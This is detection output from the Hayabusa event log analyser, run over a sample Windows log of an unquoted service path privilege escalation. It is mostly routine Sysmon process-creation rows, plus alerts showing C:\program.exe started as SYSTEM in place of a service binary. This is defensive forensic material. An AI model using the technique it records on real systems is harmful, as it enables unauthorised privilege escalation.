2020-04-26 07:19:26.635 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\dxgiadaptercache.exe | Process: C:\Windows\System32\dxgiadaptercache.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule | LID: 0x3e7 | PID: 1876 | PGUID: 747F3D96-B765-5EA4-0000-0010831F0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:26.642 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1912 | PGUID: 747F3D96-B765-5EA4-0000-00109B240100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:26.643 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1920 | PGUID: 747F3D96-B765-5EA4-0000-001031250100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:26.645 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1936 | PGUID: 747F3D96-B765-5EA4-0000-0010BE260100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:26.652 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1996 | PGUID: 747F3D96-B765-5EA4-0000-0010572D0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:27.196 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1440 | PGUID: 747F3D96-B765-5EA4-0000-00107A380100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:27.198 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1552 | PGUID: 747F3D96-B765-5EA4-0000-00100B390100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:27.473 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 2076 | PGUID: 747F3D96-B765-5EA4-0000-0010AA430100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:27.481 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\Logs\dosvc.20200425_221917_750.etl | Process: C:\Windows\System32\svchost.exe | PID: 2056 | PGUID: 747F3D96-B765-5EA4-0000-00106B420100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:27.484 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2204 | PGUID: 747F3D96-B765-5EA4-0000-0010344D0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:27.583 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2364 | PGUID: 747F3D96-B765-5EA4-0000-001016620100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:27.764 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e4 | PID: 2408 | PGUID: 747F3D96-B766-5EA4-0000-0010C4680100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:27.836 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k NetSvcs -p -s iphlpsvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2476 | PGUID: 747F3D96-B766-5EA4-0000-0010366F0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:27.838 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e4 | PID: 2488 | PGUID: 747F3D96-B766-5EA4-0000-001019700100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:27.855 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2496 | PGUID: 747F3D96-B766-5EA4-0000-001046700100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:27.970 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e4 | PID: 2632 | PGUID: 747F3D96-B766-5EA4-0000-0010A4790100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:28.014 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k utcsvc -p | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2640 | PGUID: 747F3D96-B766-5EA4-0000-0010067A0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:28.063 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k LocalServiceNoNetwork -p -s DPS | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 2704 | PGUID: 747F3D96-B766-5EA4-0000-0010DE7E0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:28.065 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2736 | PGUID: 747F3D96-B766-5EA4-0000-0010A7800100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:28.068 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s SstpSvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 2772 | PGUID: 747F3D96-B766-5EA4-0000-001074830100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:28.079 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\wlms\wlms.exe | Process: C:\Windows\System32\wlms\wlms.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2848 | PGUID: 747F3D96-B766-5EA4-0000-0010D4880100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:28.080 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"PrivEsc - Potential Unquoted Service Exploit | Cmd: c:\Program Files\vulnsvc\mmm.exe | Process: C:\program.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2856 | PGUID: 747F3D96-B766-5EA4-0000-0010E7880100 | Hash: SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:28.080 +09:00,MSEDGEWIN10,1,medium,Evas,Renamed Binary,,rules/sigma/process_creation/proc_creation_win_renamed_binary.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:28.086 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2876 | PGUID: 747F3D96-B766-5EA4-0000-0010038A0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:28.096 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2900 | PGUID: 747F3D96-B766-5EA4-0000-00104A8D0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:28.465 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k LocalService -p -s WdiServiceHost | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 3044 | PGUID: 747F3D96-B766-5EA4-0000-0010BAA10100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:32.050 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: sihost.exe | Process: C:\Windows\System32\sihost.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager | LID: 0x1d39b | PID: 3752 | PGUID: 747F3D96-B767-5EA4-0000-0010FE2E0200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:32.058 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc | Process: C:\Windows\System32\svchost.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x1d39b | PID: 3760 | PGUID: 747F3D96-B767-5EA4-0000-0010D0310200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:32.097 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s WpnUserService | Process: C:\Windows\System32\svchost.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x1d39b | PID: 3820 | PGUID: 747F3D96-B767-5EA4-0000-001097430200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:32.358 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 4264 | PGUID: 747F3D96-B768-5EA4-0000-00106FAE0200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:35.125 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\userinit.exe | Process: C:\Windows\System32\userinit.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: winlogon.exe | LID: 0x1d39b | PID: 4536 | PGUID: 747F3D96-B769-5EA4-0000-00101D9C0300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:35.236 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\Explorer.EXE | Process: C:\Windows\explorer.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\userinit.exe | LID: 0x1d39b | PID: 4600 | PGUID: 747F3D96-B76A-5EA4-0000-0010EEB50300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:36.984 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Packages\warp_jit_81c7ad1a-a25c-4a75-b512-788e5de33cfe | Process: C:\Windows\System32\svchost.exe | PID: 5632 | PGUID: 747F3D96-B76E-5EA4-0000-001034090600,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:36.984 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Packages\warp_jit_81c7ad1a-a25c-4a75-b512-788e5de33cfe\AC | Process: C:\Windows\System32\svchost.exe | PID: 5632 | PGUID: 747F3D96-B76E-5EA4-0000-001034090600,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:36.984 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Packages\warp_jit_81c7ad1a-a25c-4a75-b512-788e5de33cfe\AC\Temp | Process: C:\Windows\System32\svchost.exe | PID: 5632 | PGUID: 747F3D96-B76E-5EA4-0000-001034090600,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:36.984 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Packages\warp_jit_81c7ad1a-a25c-4a75-b512-788e5de33cfe\AC\INetCache | Process: C:\Windows\System32\svchost.exe | PID: 5632 | PGUID: 747F3D96-B76E-5EA4-0000-001034090600,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:36.984 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Packages\warp_jit_81c7ad1a-a25c-4a75-b512-788e5de33cfe\AC\INetHistory | Process: C:\Windows\System32\svchost.exe | PID: 5632 | PGUID: 747F3D96-B76E-5EA4-0000-001034090600,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:36.984 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Packages\warp_jit_81c7ad1a-a25c-4a75-b512-788e5de33cfe\AC\INetCookies | Process: C:\Windows\System32\svchost.exe | PID: 5632 | PGUID: 747F3D96-B76E-5EA4-0000-001034090600,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:37.209 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32.exe AppXDeploymentExtensions.OneCore.dll,ShellRefresh | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k wsappx -p -s AppXSvc | LID: 0x1d39b | PID: 5840 | PGUID: 747F3D96-B76F-5EA4-0000-0010624D0600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:40.692 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 6964 | PGUID: 747F3D96-B776-5EA4-0000-0010A74D0B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:19:40.712 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe\LocalBridge.exe"" /InvokerPRAID: Microsoft.MicrosoftOfficeHub notifications | Process: C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe\LocalBridge.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\System32\RuntimeBroker.exe -Embedding | LID: 0x1d39b | PID: 7000 | PGUID: 747F3D96-B776-5EA4-0000-001006590B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:20:11.341 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\eventvwr.exe"" | Process: C:\Windows\System32\eventvwr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x1d39b | PID: 6656 | PGUID: 747F3D96-B79B-5EA4-0000-00105BD50F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:20:11.402 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 6964 318 0000021FF2606500 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 6648 | PGUID: 747F3D96-B79B-5EA4-0000-001075DA0F00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:20:11.516 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\eventvwr.exe"" | Process: C:\Windows\System32\eventvwr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x1d36c | PID: 748 | PGUID: 747F3D96-B79B-5EA4-0000-001001FC0F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:20:16.073 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Discovery - domain time | Cmd: ""C:\BGinfo\BGINFO.EXE"" /accepteula /ic:\bginfo\bgconfig.bgi /timer:0 | Process: C:\BGinfo\BGINFO.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x1d39b | PID: 7056 | PGUID: 747F3D96-B7A0-5EA4-0000-001026D11000 | Hash: SHA1=1CEE3FA8419BDF4CBC266461277E3FDD9B93DE25,MD5=3652BA8B882BF6C69AF70CE73CF0D616,SHA256=0362CD6E7B318AB9A4C74DAF229F11BB795A2CE553EA024CB49143456C27C41D,IMPHASH=6EC19FF15BC88DDEDB96115003A96430",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:20:16.165 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\SecurityHealthService.exe | Process: C:\Windows\System32\SecurityHealthService.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 7088 | PGUID: 747F3D96-B7A0-5EA4-0000-001027D81000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:20:16.965 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Users\IEUser\AppData\Local\Microsoft\OneDrive\19.232.1124.0012\FileCoAuth.exe -Embedding | Process: C:\Users\IEUser\AppData\Local\Microsoft\OneDrive\19.232.1124.0012\FileCoAuth.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch -p | LID: 0x1d39b | PID: 3376 | PGUID: 747F3D96-B7A0-5EA4-0000-00108D131100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:20:18.975 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\AppData\Local\Microsoft\OneDrive\OneDrive.exe"" /background | Process: C:\Users\IEUser\AppData\Local\Microsoft\OneDrive\OneDrive.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x1d39b | PID: 864 | PGUID: 747F3D96-B7A2-5EA4-0000-0010982F1200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:20:21.251 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\regedit.exe"" | Process: C:\Windows\regedit.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x1d39b | PID: 3256 | PGUID: 747F3D96-B7A5-5EA4-0000-0010CAB51300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:20:21.263 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 6964 258 0000021FF266EC20 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 7036 | PGUID: 747F3D96-B7A5-5EA4-0000-0010EAB91300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
2020-04-26 07:20:26.261 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\regedit.exe"" | Process: C:\Windows\regedit.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x1d36c | PID: 4480 | PGUID: 747F3D96-B7AA-5EA4-0000-001066001700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
